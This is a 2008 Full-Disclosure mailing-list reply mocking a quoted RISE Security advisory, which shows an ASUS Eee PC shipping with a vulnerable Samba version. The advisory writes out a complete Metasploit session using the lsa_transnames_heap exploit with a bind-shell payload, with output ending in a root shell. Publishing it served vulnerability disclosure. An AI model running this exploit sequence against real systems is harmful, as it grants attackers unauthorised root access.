Re: ASUS Eee PC rooted out of the box

[reepex <reepex () gmail com>]

So you ran metasploit and then made a blog post. Is this what 'security
research' is considered now? And why did you write this is such a media
hyped way? Trying to get some spotlight?

On Feb 8, 2008 10:47 AM, RISE Security <advisories () risesecurity org> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> We recently acquired an ASUS Eee PC (if you want to know more about it,
> a lot of reviews are available on internet). The first thing we did when
> we put our hands at the ASUS Eee PC was to test its security. The ASUS
> Eee PC comes with a customized version of Xandros operating system
> installed, and some other bundled software like Mozilla Firefox, Pidgin,
> Skype and OpenOffice.org.
>
> Analysing the running processes of the ASUS Eee PC, the first thing that
> caught our attention was the running smbd process (the sshd daemon was
> started by us, and is not enabled by default).
>
>
> eeepc-rise:/root> ps -e
>  PID TTY          TIME CMD
>    1 ?        00:00:00 fastinit
>    2 ?        00:00:00 ksoftirqd/0
>    3 ?        00:00:00 events/0
>    4 ?        00:00:00 khelper
>    5 ?        00:00:00 kthread
>   25 ?        00:00:00 kblockd/0
>   26 ?        00:00:00 kacpid
>  128 ?        00:00:00 ata/0
>  129 ?        00:00:00 ata_aux
>  130 ?        00:00:00 kseriod
>  148 ?        00:00:00 pdflush
>  149 ?        00:00:00 pdflush
>  150 ?        00:00:00 kswapd0
>  151 ?        00:00:00 aio/0
>  152 ?        00:00:00 unionfs_siod/0
>  778 ?        00:00:00 scsi_eh_0
>  779 ?        00:00:00 scsi_eh_1
>  799 ?        00:00:00 kpsmoused
>  819 ?        00:00:00 kjournald
>  855 ?        00:00:00 fastinit
>  857 ?        00:00:00 sh
>  858 ?        00:00:00 su
>  859 tty3     00:00:00 getty
>  862 ?        00:00:00 startx
>  880 ?        00:00:00 xinit
>  881 tty2     00:00:06 Xorg
>  890 ?        00:00:00 udevd
>  952 ?        00:00:00 ksuspend_usbd
>  953 ?        00:00:00 khubd
>  1002 ?        00:00:00 acpid
>  1027 ?        00:00:00 pciehpd_event
>  1055 ?        00:00:00 ifplugd
>  1101 ?        00:00:00 scsi_eh_2
>  1102 ?        00:00:00 usb-storage
>  1151 ?        00:00:00 icewm
>  1185 ?        00:00:01 AsusLauncher
>  1186 ?        00:00:00 icewmtray
>  1188 ?        00:00:01 powermonitor
>  1190 ?        00:00:00 minimixer
>  1191 ?        00:00:00 networkmonitor
>  1192 ?        00:00:00 wapmonitor
>  1193 ?        00:00:00 x-session-manag
>  1195 ?        00:00:00 x-session-manag
>  1200 ?        00:00:00 x-session-manag
>  1201 ?        00:00:00 dispwatch
>  1217 ?        00:00:00 cupsd
>  1224 ?        00:00:00 usbstorageapple
>  1234 ?        00:00:00 kondemand/0
>  1240 ?        00:00:00 portmap
>  1248 ?        00:00:00 keyboardstatus
>  1272 ?        00:00:00 memd
>  1279 ?        00:00:00 scim-helper-man
>  1280 ?        00:00:00 scim-panel-gtk
>  1282 ?        00:00:00 scim-launcher
>  1297 ?        00:00:00 netserv
>  1331 ?        00:00:00 asusosd
>  1476 ?        00:00:00 xandrosncs-agen
>  1775 ?        00:00:00 dhclient3
>  2002 ?        00:00:00 nmbd
>  2004 ?        00:00:00 smbd
>  2005 ?        00:00:00 smbd
>  2322 ?        00:00:00 sshd
>  2345 ?        00:00:00 sshd
>  2356 pts/0    00:00:00 bash
>  2362 pts/0    00:00:00 ps
> eeepc-rise:/root>
>
>
> Retrieving the the smbd version, we discovered that it runs a vulnerable
> version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit
> we published earlier last year.
>
>
> eeepc-rise:/root> smbd --version
> Version 3.0.24
> eeepc-rise:/root>
>
>
> With this information, we ran our exploit against the ASUS Eee PC using
> the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
> Debian based).
>
>
> msf > use linux/samba/lsa_transnames_heap
> msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
> RHOST => 192.168.50.10
> msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
> PAYLOAD => linux/x86/shell_bind_tcp
> msf exploit(lsa_transnames_heap) > show targets
>
> Exploit targets:
>
>   Id  Name
>   --  ----
>   0   Linux vsyscall
>   1   Linux Heap Brute Force (Debian/Ubuntu)
>   2   Linux Heap Brute Force (Gentoo)
>   3   Linux Heap Brute Force (Mandriva)
>   4   Linux Heap Brute Force (RHEL/CentOS)
>   5   Linux Heap Brute Force (SUSE)
>   6   Linux Heap Brute Force (Slackware)
>   7   DEBUG
>
>
> msf exploit(lsa_transnames_heap) > set TARGET 1
> TARGET => 1
> msf exploit(lsa_transnames_heap) > exploit
> [*] Started bind handler
> [*] Creating nop sled....
> ...
> [*] Trying to exploit Samba with address 0x08415000...
> [*] Connecting to the SMB service...
> [*] Binding to
> 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc]
> ...
> [*] Bound to
> 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc]
> ...
> [*] Calling the vulnerable function...
> [+] Server did not respond, this is expected
> [*] Command shell session 1 opened (192.168.50.201:33694 ->
> 192.168.50.10:4444)
> msf exploit(lsa_transnames_heap) > sessions -i 1
> [*] Starting interaction with 1...
>
> uname -a
> Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
> GNU/Linux
> id
> uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)
>
>
> Easy to learn, Easy to work, Easy to root.
>
>
> The original blog post and more information can be found in our
> website at http://risesecurity.org/.
>
> Best regards,
> RISE Security
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.6 (GNU/Linux)
>
> iD8DBQFHrIeHhFjK78TGSUERAvq7AJ9iz2sHD4/cQ0CdlCC1axNiVhwmJwCfddEd
> 6tg6XRBCWHfPWFrSdVKu5oA=
> =OFwe
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/